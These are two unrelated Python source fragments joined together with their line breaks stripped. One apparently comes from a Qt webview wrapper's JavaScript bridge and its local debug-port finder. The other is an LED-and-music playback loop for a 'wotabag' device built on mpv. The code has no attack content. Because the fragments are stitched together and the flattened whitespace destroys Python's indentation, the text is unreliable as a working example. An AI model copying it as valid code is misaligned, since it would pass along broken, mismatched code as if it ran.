result_semaphore.acquire() result = deepcopy(self._js_results[unique_id]["result"]) del self._js_results[unique_id] return result def _set_js_api(self): def _register_window_object(): frame.addToJavaScriptWindowObject("external", self.js_bridge) code = "qtwebengine" if is_webengine else "qtwebkit" script = parse_api_js(self.js_bridge.window, code) if is_webengine: qwebchannel_js = QtCore.QFile("://qtwebchannel/qwebchannel.js") if qwebchannel_js.open(QtCore.QFile.ReadOnly): source = bytes(qwebchannel_js.readAll()).decode("utf-8") self.view.page().runJavaScript(source) self.channel.registerObject("external", self.js_bridge) qwebchannel_js.close() else: frame = self.view.page().mainFrame() _register_window_object() try: self.view.page().runJavaScript(script) except AttributeError: # < QT 5.6 self.view.page().mainFrame().evaluateJavaScript(script) self.loaded.set() @staticmethod def _convert_string(result): try: if result is None or result.isNull(): return None result = result.toString() # QJsonValue conversion except AttributeError: pass return convert_string(result) @staticmethod def _get_debug_port(): """ Check if default debug port 8228 is available, increment it by 1 until a port is available. :return: port: str """ port_available = False port = 8228 while not port_available: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("localhost", port)) port_available = True except: port_available = False logger.warning("Port %s is in use" % port) port += 1 finally: sock.close() return str(port) @staticmethod # Receive func from subthread and execute it on the main thread def on_create_window(func): func()
def _wota_playback(self): while self.current_track < len(self.playlist): song, _ = self.playlist[self.current_track] self._load_file(song) if self.player: self.player.terminate() self.player = MPV(vid='no', hwdec='mmal', keep_open='yes', volume=self.volume, log_handler=self._mpv_log) self.player.play(self.song['filename']) # wait for mpv to actually start playing playback_lock = Semaphore(value=0) def observer(name, val): if val is not None: playback_lock.release() self.player.observe_property('time-pos', observer) playback_lock.acquire() self.player.unobserve_property('time-pos', observer) start = time.time() ticks = 0 # drift = 0 bpm = 120 cur_colors = { 'left': BladeColor.YOSHIKO, 'center': BladeColor.YOSHIKO, 'right': BladeColor.YOSHIKO, } initial_offset = self.song.get('initial_offset', 0) if initial_offset: time.sleep((start + initial_offset / 1000) - time.time()) last_tick = time.perf_counter() # play led patterns for pattern in self.song['patterns']: if 'bpm' in pattern: bpm = pattern['bpm'] for k in ['left', 'center', 'right']: if k in pattern: if isinstance(pattern[k], list): colors = [] for c in pattern[k]: color = c.upper() if color in BladeColor.__members__: colors.append(BladeColor[color]) cur_colors[k] = tuple(colors) else: color = pattern[k].upper() if color in BladeColor.__members__: cur_colors[k] = BladeColor[color] kwargs = pattern.get('kwargs', {}) kwargs.update(cur_colors) wota = WOTA_TYPE[pattern['type']](bpm=bpm, strip=self.strip, **kwargs) count = pattern.get('count', 1) for i in range(count): for _ in range(len(wota)): if self._stopped.is_set(): return next_tick = last_tick + wota.tick_s # if i == 0 or i == count - 1: # loop = False # else: # loop = True loop = True wota.tick(loop=loop) diff = next_tick - time.perf_counter() last_tick = next_tick # drift = 0 if diff > 0: time.sleep(diff) # elif diff < 0: # drift = diff ticks += 1 with self.player._playback_cond: # wait for mpv to reach the end of the audio file or 5 seconds, # whichever comes first self.player._playback_cond.wait(5) # end of song, setup next track self.player.terminate() self.player = None for i in range(self.strip.numPixels()): self.strip.setPixelColor(i, BladeColor.NONE.value) self.strip.show() self.current_track += 1 self.current_track = 0 self._status_lock.acquire() self.status = WotabagStatus.IDLE self._status_lock.release()